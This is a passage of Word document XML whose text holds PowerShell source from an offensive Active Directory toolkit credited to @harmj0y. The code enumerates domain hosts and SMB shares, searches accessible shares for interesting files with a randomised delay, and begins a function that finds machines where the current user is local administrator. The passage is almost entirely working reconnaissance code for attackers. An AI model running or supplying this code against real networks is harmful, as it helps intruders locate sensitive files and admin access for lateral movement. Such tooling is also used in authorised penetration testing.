      </w:r>
    </w:p>
    <w:p w14:paraId="0344BF52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F6C6A60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $NetName = $Share.shi1_netname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39F0EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Path = '\\'+$ComputerName+'\'+$NetName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC4482" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="473D00AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # make sure we get a real share name back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4FB156" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if (($NetName) -and ($NetName.trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E52E478" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D139A39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # skip this share if it's in the exclude list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34105340" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if ($ExcludedShares -NotContains $NetName.ToUpper()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71569038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                # check if the user has access to this path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E7A99C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262837C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $Null = [IO.Directory]::GetFiles($Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B26A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $SearchShares += $Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5CE9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A348552" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB99CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    Write-Verbose "[!] No access to $Path"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877D604" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A2634" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45786F0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384967F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73256C0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF3750" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9FD5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CA991A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach($Share in $SearchShares) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045AEB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SearchArgs =  @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4BEC9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'Path' = $Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0DF82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'SearchTerms' = $SearchTerms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B58F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'OfficeDocs' = $OfficeDocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0D44C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'FreshEXEs' = $FreshEXEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD35E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'LastAccessTime' = $LastAccessTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F09FE5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'LastWriteTime' = $LastWriteTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D702401" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'CreationTime' = $CreationTime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32221B9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'ExcludeFolders' = $ExcludeFolders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A73C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'ExcludeHidden' = $ExcludeHidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1787C0E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'CheckWriteAccess' = $CheckWriteAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF44B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'OutFile' = $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB02AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA2B8E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B909D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7007C10E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Find-InterestingFile @SearchArgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486371C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD2548" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C1B97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B40EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DC6B277" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB96E6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26CE145B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFA8D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D52BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50CC088E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E711F01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF4707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09148CF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ExcludedShares' = $ExcludedShares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7470CD1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'SearchTerms' = $SearchTerms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A25F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ExcludeFolders' = $ExcludeFolders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F000C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'OfficeDocs' = $OfficeDocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5581903E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'ExcludeHidden' = $ExcludeHidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66878A17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'FreshEXEs' = $FreshEXEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C97FF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'CheckWriteAccess' = $CheckWriteAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E872F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'OutFile' = $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5044C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'UsePSDrive' = $UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49129281" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B2FDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EB7F253" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8271B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Shares) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60FF30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # pass the shares as the hosts so the threaded function code doesn't have to be hacked up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402AC01C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Invoke-ThreadedFunction -ComputerName $Shares -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318CCAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29713F99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1AB3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D33617B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672FA48A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C841E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="02946FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138DA50E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Shares){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01D611" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = $Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7E1BB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F96D7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif(-not $NoPing -and ($ComputerName.count -gt 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E9DE26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC492C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078FF002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F73A18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227C7B7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C9A6346" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF2761" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6A1DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="00AC44CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD811B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Computer: $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C5785" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F267DFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12BBD8E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D0423" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161493FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E7D8875" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $_ ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8B18B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19EFEE73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $_, $False, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249B7A29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA3C33" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD47167" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F6672" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D9D7B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A355914" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BA726B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-LocalAdminAccess {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26840049" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310BBBE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34360E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="300A8636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds machines on the local domain where the current user has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECB9844" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        local administrator access. Uses multithreading to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D2998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        speed up enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F516B3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="318BAD6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688CCCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5925694D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B459BD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08788464" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="127B986B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function finds the local domain name for a host using Get-NetDomain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92FB2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        queries the domain for all active machines with Get-NetComputer, then for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA603C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        each server it checks if the current user has local administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000ABFCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        access using Invoke-CheckLocalAdminAccess.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D0BCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D6A28EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Idea stolen from the local_admin_search_enum post module in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB15D86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Metasploit written by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5DAB87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            'Brandon McCann "zeknox" &lt;bmccann[at]accuvant.com&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A4FAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Thomas McCarthy "smilingraccoon" &lt;smilingraccoon[at]gmail.com&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FA6CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Royce Davis "r3dy" &lt;rdavis[at]accuvant.com&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E98C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73470A3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0760B61B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
